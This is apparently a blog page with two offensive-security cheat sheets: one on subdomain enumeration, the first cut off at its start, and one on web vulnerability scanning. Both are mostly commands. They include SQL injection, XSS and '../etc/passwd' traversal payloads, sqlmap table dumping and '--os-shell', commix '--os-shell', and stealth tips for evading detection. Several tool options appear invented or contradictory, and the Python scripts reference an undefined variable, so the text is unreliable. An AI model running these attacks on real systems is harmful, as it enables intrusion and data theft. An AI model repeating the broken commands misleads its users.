dnsrecon -d TARGET_DOMAIN -t 50 # With timeout dnsrecon -d TARGET_DOMAIN -t 10 # With specific record types dnsrecon -d TARGET_DOMAIN -t A,AAAA,CNAME,MX,NS,SOA,TXT # With all record types dnsrecon -d 
TARGET_DOMAIN -t all # With brute force dnsrecon -d TARGET_DOMAIN -b # With wordlist dnsrecon -d TARGET_DOMAIN -w wordlist.txt Fierce Basic Subdomain Enumeration # Basic subdomain enumeration fierce -dns TARGET_DOMAIN # With multiple domains fierce -dns TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file fierce -dns TARGET_DOMAIN -file results.txt # With verbose output fierce -dns TARGET_DOMAIN -verbose # With threads fierce -dns TARGET_DOMAIN -threads 50 # With timeout fierce -dns TARGET_DOMAIN -timeout 10 # With wordlist fierce -dns TARGET_DOMAIN -wordlist wordlist.txt # With range fierce -dns TARGET_DOMAIN -range 192.168.1.0/24 # With delay fierce -dns TARGET_DOMAIN -delay 1 DNSenum Basic DNS Enumeration # Basic DNS enumeration dnsenum TARGET_DOMAIN # With multiple domains dnsenum TARGET_DOMAIN1 TARGET_DOMAIN2 # With output file dnsenum TARGET_DOMAIN -o results.txt # With verbose output dnsenum TARGET_DOMAIN -v # With threads dnsenum TARGET_DOMAIN -t 50 # With timeout dnsenum TARGET_DOMAIN -t 10 # With wordlist dnsenum TARGET_DOMAIN -w wordlist.txt # With range dnsenum TARGET_DOMAIN -r 192.168.1.0/24 # With delay dnsenum TARGET_DOMAIN -d 1 Custom Scripts Python Subdomain Enumeration import requests import threading import queue import time import dns.resolver def subdomain_enumeration(domain, wordlist, threads=10, delay=0): def worker(): while True: try: subdomain = wordlist.get() if subdomain is None: break full_domain = f"{subdomain}.{domain}" # DNS resolution try: dns.resolver.resolve(full_domain, 'A') print(f"[DNS] {full_domain}") except: pass # HTTP check try: response = requests.get(f"http://{full_domain}", timeout=5) print(f"[HTTP] {full_domain} - {response.status_code}") except: pass # HTTPS check try: response = requests.get(f"https://{full_domain}", timeout=5) print(f"[HTTPS] {full_domain} - {response.status_code}") except: pass time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = 
threading.Thread(target=worker) t.daemon = True t.start() # Add subdomains to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage domain = "TARGET_DOMAIN" wordlist_file = "/usr/share/wordlists/subdomains.txt" wordlist = queue.Queue() subdomain_enumeration(domain, wordlist, threads=20, delay=0.1) Bash Subdomain Enumeration #!/bin/bash DOMAIN="TARGET_DOMAIN" WORDLIST="/usr/share/wordlists/subdomains.txt" THREADS=10 # Function to check subdomain check_subdomain() { local subdomain=$1 local full_domain="${subdomain}.${DOMAIN}" # DNS resolution if nslookup "$full_domain" > /dev/null 2>&1; then echo "[DNS] $full_domain" fi # HTTP check if curl -s -o /dev/null -w "%{http_code}" "http://$full_domain" | grep -q "200\|301\|302\|403\|401"; then echo "[HTTP] $full_domain" fi # HTTPS check if curl -s -o /dev/null -w "%{http_code}" "https://$full_domain" | grep -q "200\|301\|302\|403\|401"; then echo "[HTTPS] $full_domain" fi } # Export function for parallel export -f check_subdomain export DOMAIN # Run parallel subdomain check cat "$WORDLIST" | parallel -j "$THREADS" check_subdomain {} Wordlists Common Subdomain Wordlists # SecLists subdomain wordlists /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt /usr/share/wordlists/SecLists/Discovery/DNS/dns-Jhaddix.txt # Custom subdomain wordlists /usr/share/wordlists/custom/subdomains.txt /usr/share/wordlists/custom/api-subdomains.txt /usr/share/wordlists/custom/admin-subdomains.txt # Generate custom wordlists echo "www,mail,ftp,admin,api,dev,test,staging,prod" | tr ',' '\n' > custom_subdomains.txt Creating Custom Wordlists # Extract subdomains from certificate transparency logs curl -s "https://crt.sh/?q=%.TARGET_DOMAIN&output=json" | jq -r '.[].name_value' | sort -u > crt_subdomains.txt # Extract subdomains from DNS records dig @8.8.8.8 TARGET_DOMAIN ANY 
| grep -oP 'IN\s+\w+\s+\K[^\s]+' | sort -u > dns_subdomains.txt # Combine multiple wordlists cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined_wordlist.txt # Remove empty lines and duplicates grep -v '^$' wordlist.txt | sort -u > clean_wordlist.txt API-based Enumeration Shodan API # Using Shodan CLI shodan domain TARGET_DOMAIN # Using Shodan API curl -s "https://api.shodan.io/dns/domain/TARGET_DOMAIN?key=YOUR_API_KEY" | jq -r '.data[].subdomain' | sort -u Censys API # Using Censys API curl -s "https://censys.io/api/v1/search/certificates" \ -H "Authorization: Basic YOUR_API_KEY" \ -d '{"query": "TARGET_DOMAIN", "fields": ["parsed.names"]}' | jq -r '.result.hits[].parsed.names[]' | sort -u VirusTotal API # Using VirusTotal API curl -s "https://www.virustotal.com/vtapi/v2/domain/report" \ -d "apikey=YOUR_API_KEY" \ -d "domain=TARGET_DOMAIN" | jq -r '.subdomains[]' | sort -u Passive vs Active Enumeration Passive Enumeration # Using only passive sources subfinder -d TARGET_DOMAIN -sources crtsh,passivetotal,shodan # Using only passive DNS dnsrecon -d TARGET_DOMAIN -t A,AAAA,CNAME,MX,NS,SOA,TXT # Using only certificate transparency curl -s "https://crt.sh/?q=%.TARGET_DOMAIN&output=json" | jq -r '.[].name_value' | sort -u Active Enumeration # Using brute force amass enum -d TARGET_DOMAIN -brute # Using wordlist subfinder -d TARGET_DOMAIN -w wordlist.txt # Using recursive enumeration subfinder -d TARGET_DOMAIN -recursive Best Practices Rate Limiting # Add delay between requests subfinder -d TARGET_DOMAIN -rate-limit 100 # Use fewer threads subfinder -d TARGET_DOMAIN -t 10 # Use proxy rotation subfinder -d TARGET_DOMAIN -proxy http://proxy1:8080 Stealth Mode # Use random user agents subfinder -d TARGET_DOMAIN -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays subfinder -d TARGET_DOMAIN -rate-limit 50 # Use smaller wordlists subfinder -d TARGET_DOMAIN -w 
/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Output Analysis # Save results to file subfinder -d TARGET_DOMAIN -o results.txt # Filter by status code grep "200" results.txt grep "403" results.txt grep "301\|302" results.txt # Sort by response size sort -k3 -n results.txt Troubleshooting Common Issues # Connection timeout subfinder -d TARGET_DOMAIN -timeout 5 # Too many requests subfinder -d TARGET_DOMAIN -rate-limit 50 # Invalid SSL certificate subfinder -d TARGET_DOMAIN -k # Authentication required subfinder -d TARGET_DOMAIN -u admin -p password Performance Optimization # Use appropriate thread count subfinder -d TARGET_DOMAIN -t 20 # Use smaller wordlists for initial scan subfinder -d TARGET_DOMAIN -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt # Use specific sources subfinder -d TARGET_DOMAIN -sources crtsh,passivetotal Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate wordlists for the target Document findings properly Follow responsible disclosure practices

1월 10, 2025 · 7 분

Vulnerability Scanner Tools

Vulnerability Scanner Tools Comprehensive collection of web application vulnerability scanner tools and techniques for security testing. Nikto Basic Vulnerability Scanning # Basic vulnerability scan nikto -h http://TARGET_URL # With HTTPS nikto -h https://TARGET_URL # With specific port nikto -h http://TARGET_URL -p 8080 # With multiple hosts nikto -h http://TARGET_URL1,http://TARGET_URL2 # With output file nikto -h http://TARGET_URL -o results.txt # With XML output nikto -h http://TARGET_URL -Format xml -o results.xml # With JSON output nikto -h http://TARGET_URL -Format json -o results.json # With verbose output nikto -h http://TARGET_URL -v # With silent output nikto -h http://TARGET_URL -s Advanced Nikto Options # With specific plugins nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" # With all plugins nikto -h http://TARGET_URL -Plugins all # With exclude plugins nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" -exclude "apacheusers" # With custom user agent nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies nikto -h http://TARGET_URL -C "PHPSESSID=abc123" # With authentication nikto -h http://TARGET_URL -id admin:password # With proxy nikto -h http://TARGET_URL -useproxy http://127.0.0.1:8080 # With timeout nikto -h http://TARGET_URL -timeout 10 # With retries nikto -h http://TARGET_URL -retries 3 # With SSL options nikto -h https://TARGET_URL -ssl -nossl # With specific checks nikto -h http://TARGET_URL -Tuning 1,2,3,4,5,6,7,8,9,0,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z Wapiti Basic Vulnerability Scanning # Basic vulnerability scan wapiti -u http://TARGET_URL # With HTTPS wapiti -u https://TARGET_URL # With specific port wapiti -u http://TARGET_URL:8080 # With output file wapiti -u http://TARGET_URL -o results.txt # With XML output wapiti -u http://TARGET_URL -f xml -o results.xml # With JSON output wapiti -u http://TARGET_URL -f json -o results.json # With 
verbose output wapiti -u http://TARGET_URL -v # With silent output wapiti -u http://TARGET_URL -s Advanced Wapiti Options # With specific modules wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" # With all modules wapiti -u http://TARGET_URL -m all # With exclude modules wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" -e "sql" # With custom user agent wapiti -u http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" # With authentication wapiti -u http://TARGET_URL -a admin:password # With proxy wapiti -u http://TARGET_URL -p http://127.0.0.1:8080 # With timeout wapiti -u http://TARGET_URL -t 10 # With retries wapiti -u http://TARGET_URL -r 3 # With SSL options wapiti -u https://TARGET_URL -k # With specific checks wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" -a "Mozilla/5.0" Nuclei Basic Vulnerability Scanning # Basic vulnerability scan nuclei -u http://TARGET_URL # With HTTPS nuclei -u https://TARGET_URL # With specific port nuclei -u http://TARGET_URL:8080 # With multiple targets nuclei -l targets.txt # With output file nuclei -u http://TARGET_URL -o results.txt # With JSON output nuclei -u http://TARGET_URL -json -o results.json # With verbose output nuclei -u http://TARGET_URL -v # With silent output nuclei -u http://TARGET_URL -silent Advanced Nuclei Options # With specific templates nuclei -u http://TARGET_URL -t templates/sql-injection.yaml # With all templates nuclei -u http://TARGET_URL -t templates/ # With exclude templates nuclei -u http://TARGET_URL -t templates/ -exclude-templates templates/sql-injection.yaml # With custom user agent nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123" # With authentication nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" # With proxy nuclei -u 
http://TARGET_URL -proxy http://127.0.0.1:8080 # With timeout nuclei -u http://TARGET_URL -timeout 10 # With retries nuclei -u http://TARGET_URL -retries 3 # With SSL options nuclei -u https://TARGET_URL -k # With specific checks nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml OWASP ZAP Basic Vulnerability Scanning # Basic vulnerability scan zap-baseline.py -t http://TARGET_URL # With HTTPS zap-baseline.py -t https://TARGET_URL # With specific port zap-baseline.py -t http://TARGET_URL:8080 # With output file zap-baseline.py -t http://TARGET_URL -r results.html # With XML output zap-baseline.py -t http://TARGET_URL -x results.xml # With JSON output zap-baseline.py -t http://TARGET_URL -J results.json # With verbose output zap-baseline.py -t http://TARGET_URL -v # With silent output zap-baseline.py -t http://TARGET_URL -s Advanced OWASP ZAP Options # With specific policies zap-baseline.py -t http://TARGET_URL -P policy.xml # With all policies zap-baseline.py -t http://TARGET_URL -P all # With exclude policies zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss" # With custom user agent zap-baseline.py -t http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies zap-baseline.py -t http://TARGET_URL -c "PHPSESSID=abc123" # With authentication zap-baseline.py -t http://TARGET_URL -u admin:password # With proxy zap-baseline.py -t http://TARGET_URL -p http://127.0.0.1:8080 # With timeout zap-baseline.py -t http://TARGET_URL -T 10 # With retries zap-baseline.py -t http://TARGET_URL -R 3 # With SSL options zap-baseline.py -t https://TARGET_URL -k # With specific checks zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss" Custom Scripts Python Vulnerability Scanner import requests import threading import queue import time import re def vulnerability_scanner(url, wordlist, threads=10, delay=0): def worker(): while True: try: path = wordlist.get() if path is 
None: break full_url = url.rstrip('/') + '/' + path.strip() # SQL Injection check sql_payloads = ["'", "\"", "';", "\";", "' OR 1=1--", "\" OR 1=1--"] for payload in sql_payloads: test_url = full_url + "?id=" + payload response = requests.get(test_url, timeout=5) if "error" in response.text.lower() or "mysql" in response.text.lower(): print(f"[SQL Injection] {test_url}") # XSS check xss_payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"] for payload in xss_payloads: test_url = full_url + "?search=" + payload response = requests.get(test_url, timeout=5) if payload in response.text: print(f"[XSS] {test_url}") # Directory traversal check traversal_payloads = ["../", "..\\", "....//", "....\\\\"] for payload in traversal_payloads: test_url = full_url + "?file=" + payload + "etc/passwd" response = requests.get(test_url, timeout=5) if "root:" in response.text: print(f"[Directory Traversal] {test_url}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add paths to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/dirb/common.txt" wordlist = queue.Queue() vulnerability_scanner(url, wordlist, threads=20, delay=0.1) Bash Vulnerability Scanner #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/dirb/common.txt" THREADS=10 # Function to check vulnerabilities check_vulnerabilities() { local path=$1 local full_url="${TARGET_URL}/${path}" # SQL Injection check sql_payloads=("'" "\"" "';" "\";" "' OR 1=1--" "\" OR 1=1--") for payload in "${sql_payloads[@]}"; do test_url="${full_url}?id=${payload}" response=$(curl -s "$test_url") if echo "$response" | grep -qi "error\|mysql"; then echo "[SQL Injection] $test_url" fi done # XSS check 
xss_payloads=("<script>alert('XSS')</script>" "<img src=x onerror=alert('XSS')>") for payload in "${xss_payloads[@]}"; do test_url="${full_url}?search=${payload}" response=$(curl -s "$test_url") if echo "$response" | grep -q "$payload"; then echo "[XSS] $test_url" fi done # Directory traversal check traversal_payloads=("../" "..\\" "....//" "....\\\\") for payload in "${traversal_payloads[@]}"; do test_url="${full_url}?file=${payload}etc/passwd" response=$(curl -s "$test_url") if echo "$response" | grep -q "root:"; then echo "[Directory Traversal] $test_url" fi done } # Export function for parallel export -f check_vulnerabilities export TARGET_URL # Run parallel vulnerability check cat "$WORDLIST" | parallel -j "$THREADS" check_vulnerabilities {} Vulnerability Types SQL Injection # Basic SQL injection test sqlmap -u "http://TARGET_URL/page.php?id=1" # With POST data sqlmap -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://TARGET_URL/page.php?id=1" --cookie="PHPSESSID=abc123" # With headers sqlmap -u "http://TARGET_URL/page.php?id=1" --headers="User-Agent: CustomAgent" # With proxy sqlmap -u "http://TARGET_URL/page.php?id=1" --proxy="http://127.0.0.1:8080" # With authentication sqlmap -u "http://TARGET_URL/page.php?id=1" --auth-type=basic --auth-cred="admin:password" # With database enumeration sqlmap -u "http://TARGET_URL/page.php?id=1" --dbs sqlmap -u "http://TARGET_URL/page.php?id=1" --tables sqlmap -u "http://TARGET_URL/page.php?id=1" --columns -T users sqlmap -u "http://TARGET_URL/page.php?id=1" --dump -T users # With OS shell sqlmap -u "http://TARGET_URL/page.php?id=1" --os-shell XSS (Cross-Site Scripting) # Basic XSS test xsser -u "http://TARGET_URL/page.php?search=test" # With POST data xsser -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies xsser -u "http://TARGET_URL/page.php?search=test" --cookie="PHPSESSID=abc123" # With headers xsser -u 
"http://TARGET_URL/page.php?search=test" --headers="User-Agent: CustomAgent" # With proxy xsser -u "http://TARGET_URL/page.php?search=test" --proxy="http://127.0.0.1:8080" # With authentication xsser -u "http://TARGET_URL/page.php?search=test" --auth="admin:password" # With payloads xsser -u "http://TARGET_URL/page.php?search=test" --payload="<script>alert('XSS')</script>" # With encoding xsser -u "http://TARGET_URL/page.php?search=test" --encode Command Injection # Basic command injection test commix -u "http://TARGET_URL/page.php?cmd=test" # With POST data commix -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies commix -u "http://TARGET_URL/page.php?cmd=test" --cookie="PHPSESSID=abc123" # With headers commix -u "http://TARGET_URL/page.php?cmd=test" --headers="User-Agent: CustomAgent" # With proxy commix -u "http://TARGET_URL/page.php?cmd=test" --proxy="http://127.0.0.1:8080" # With authentication commix -u "http://TARGET_URL/page.php?cmd=test" --auth="admin:password" # With OS shell commix -u "http://TARGET_URL/page.php?cmd=test" --os-shell Best Practices Rate Limiting # Add delay between requests nikto -h http://TARGET_URL -timeout 10 # Use fewer threads nuclei -u http://TARGET_URL -t 10 # Use proxy rotation nuclei -u http://TARGET_URL -proxy http://proxy1:8080 Stealth Mode # Use random user agents nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays nuclei -u http://TARGET_URL -rate-limit 50 # Use smaller wordlists nuclei -u http://TARGET_URL -t templates/sql-injection.yaml Output Analysis # Save results to file nikto -h http://TARGET_URL -o results.txt # Filter by severity grep "HIGH" results.txt grep "MEDIUM" results.txt grep "LOW" results.txt # Sort by vulnerability type grep "SQL Injection" results.txt grep "XSS" results.txt grep "Command Injection" results.txt Troubleshooting Common Issues # Connection timeout nikto -h http://TARGET_URL -timeout 30 # 
Too many requests nuclei -u http://TARGET_URL -rate-limit 50 # Invalid SSL certificate nuclei -u https://TARGET_URL -k # Authentication required nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" Performance Optimization # Use appropriate concurrency nuclei -u http://TARGET_URL -c 20 # Use smaller wordlists for initial scan nuclei -u http://TARGET_URL -t templates/sql-injection.yaml # Use specific templates nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate tools for the target Document findings properly Follow responsible disclosure practices

1월 10, 2025 · 7 분